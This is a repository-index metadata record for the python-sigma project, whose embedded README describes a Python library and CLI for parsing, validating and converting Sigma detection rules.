{"id":17141717,"url":"https://github.com/calebstewart/python-sigma","last_synced_at":"2025-04-13T10:23:21.876Z","repository":{"id":41849383,"uuid":"455389808","full_name":"calebstewart/python-sigma","owner":"calebstewart","description":"Python API for interacting with sigma rules.","archived":false,"fork":false,"pushed_at":"2022-07-01T14:24:03.000Z","size":731,"stargazers_count":50,"open_issues_count":1,"forks_count":5,"subscribers_count":8,"default_branch":"main","last_synced_at":"2025-03-27T01:47:35.232Z","etag":null,"topics":["blueteam","cyber","detection","security","sigma"],"latest_commit_sha":null,"homepage":"https://sigma.calebstew.art/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/calebstewart.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-02-04T01:43:44.000Z","updated_at":"2025-01-30T19:43:58.000Z","dependencies_parsed_at":"2022-08-11T19:20:40.637Z","dependency_job_id":null,"html_url":"https://github.com/calebstewart/python-sigma","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fpython-sigma","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fpython-sigma/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fpython-sigma/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fpython-sigma/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/calebstewart","download_url":"https://codeload.github.com/calebstewart/python-sigma/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248696281,"owners_count":21147097,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blueteam","cyber","detection","security","sigma"],"created_at":"2024-10-14T20:26:18.869Z","updated_at":"2025-04-13T10:23:21.849Z","avatar_url":"https://github.com/calebstewart.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Python Sigma Rule Parsing Library\n\nThis library attempts to abstract the handling of Sigma rules in Python.\nThe rules are parsed using a schema defined with `pydantic`, and can be\neasily loaded from YAML files into a structured Python object.\n\n```py\nfrom sigma.schema import Rule\n\n# Load a rule into a python object\nrule = Rule.from_yaml(\"test-rule.yml\")\n\n# Simple properties are accessible directly\nprint(rule.title)\nprint(rule.author)\n\n# Detection conditions are also available unchanged\nprint(rule.detection.condition)\nprint(rule.detection.my_condition_name)\n\n# Parsed/unified grammar from the condition is easy!\nprint(rule.detection.expression)\n```\n\nThis project is under active development, and this readme may or may not\nreflect the most up-to-date documentation. In general, you should refer\nto the generated documentation (instructions for building below) and the\ncommand-line help output for details until the library/tools reach a\nstable state.\n\n## Installation\n\nThe library and command line interface can be installed using `pip` from\ngithub with:\n\n``` sh\n# Install directly from github\npip install git+ssh://git@github.com/calebstewart/python-sigma.git\n\n# Checkout the repo, then install\ngit clone git@github.com:calebstewart/python-sigma.git\ncd python-sigma\npip install .\n```\n\nIf you would like to participate in development, you should use Python\nPoetry to manage your virtual environment and dependencies. For more\ninformation see [the Poetry documentation](https://python-poetry.org/docs/).\n\n``` sh\n# Setup Python development environment\ngit clone git@github.com:calebstewart/python-sigma.git\ncd python-sigma\npoetry install\n\n# Enter the virtual environment to interact with the package\npoetry shell\n\n# Type \"exit\" to leave the poetry virtual environment\n```\n\n## Documentation\n\nDocumentation can be built using Sphinx from this repository. First,\ninstall the package with the documentation dependencies, then run\n`make html` from the `docs/` directory:\n\n``` sh\n# Install with the docs extras\npoetry install -E docs\n\n# Enter the poetry virtual environment\npoetry shell\n\n# Build the documentation\ncd docs\nmake html\n\n# Open the documentation in docs/_build/index.html\n```\n\nAt this time, documentation is built automatically from docstrings and\ntype-hinting in the project code itself. The plan is to eventually augment\nthis auto-generated documentation, but that is a project for later after\nthe API and CLI interfaces solidify. That being said, extensive examples\nand documentation have been added where appropriate using module docstrings\nthroughout the project, so the documentation should at least be usable.\n\n## Command Line Interface\n\nThere is a command line interface exposed by the entrpoint `sigma` which\nis installed with this package. The `sigma` command provides subcommands\nfor inspecting rule and configuration schema, viewing/updating the MITRE\nATT\u0026CK database cache, validating serializer or rule configurations, and\nconverting rules using built-in or custom serializers.\n\nThis project is still under active development, and the interface could\nchange at any time. You should check the built-in help by running\n`sigma --help` at the command line, however for completeness sake, the\ncurrent help output/list of subcommands is:\n\n``` sh\n$ sigma --help\nUsage: sigma [OPTIONS] COMMAND [ARGS]...\n\n  Sigma Rule conversion and validation CLI.\n\nOptions:\n  --help  Show this message and exit.\n\nCommands:\n  convert    Convert Sigma rules to various formats using built-in or...\n  list       List built-in transforms and serializers\n  mitre      Browse and update the MITRE ATT\u0026CK data cache\n  schema     Dump the schema for rules, serializers, and transforms\n  transform  Transform a list of rules using a list of transforms in a...\n  validate   Validate Sigma rule or serializer schema\n```\n\n## But... why?\n\nThe official Sigma repository contains the `sigmac` tool for converting\nsigma rules from sigma format to a variety of backend detection systems.\nHowever, this tool has aged poorly. The code is messy and hard to follow\nand documentation is limited. It appears the Sigma team is attempting to\nreplace `sigmac` with [pySigma](https://github.com/SigmaHQ/pySigma), but\nthe project is pretty new, and I wanted something I could iterate on and\nhave control over in the short term.\n\nAlso, the processing of sigma rules simply seems overly complex in both\ncases. This may be a \"grass is greener\" problem on my part, but the worst\ncase for me doing this is that I better understand the problems inherent\nin building a Sigma rule API/converter, and can hopefully give back to the\ncommunity in some way in the future.\n\nLastly, I wanted to build this tool with a focus on modern API interfaces\nand aggressive documentation. I plan to utilize `pydantic` heavily to make\nvalidation of fields and values more straightforward and pythonic as well\nas provide a simple interface for others to ingest Sigma rules directly.\nFor example, being able to load, inspect and possibly modify sigma rules\nfrom Python without using the conversion tool would be a great feature for\nteams trying to work Sigma into their automation pipeline.\n\nAll that being said, I want to be abundantly clear: **The sigma project\nand all the code associated with it have been immensely helpful, and the\nabove is not meant to dig on the team, their code or their contributions\nto the community.** I greatly appreciate and admire all the hard work\nthe SigmaHQ team has put into making the detection of malicious activity\nbetter over the years. I only hope that I can either learn something or\nmaybe provide something useful back to the community myself. :smile:\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcalebstewart%2Fpython-sigma","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcalebstewart%2Fpython-sigma","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcalebstewart%2Fpython-sigma/lists"}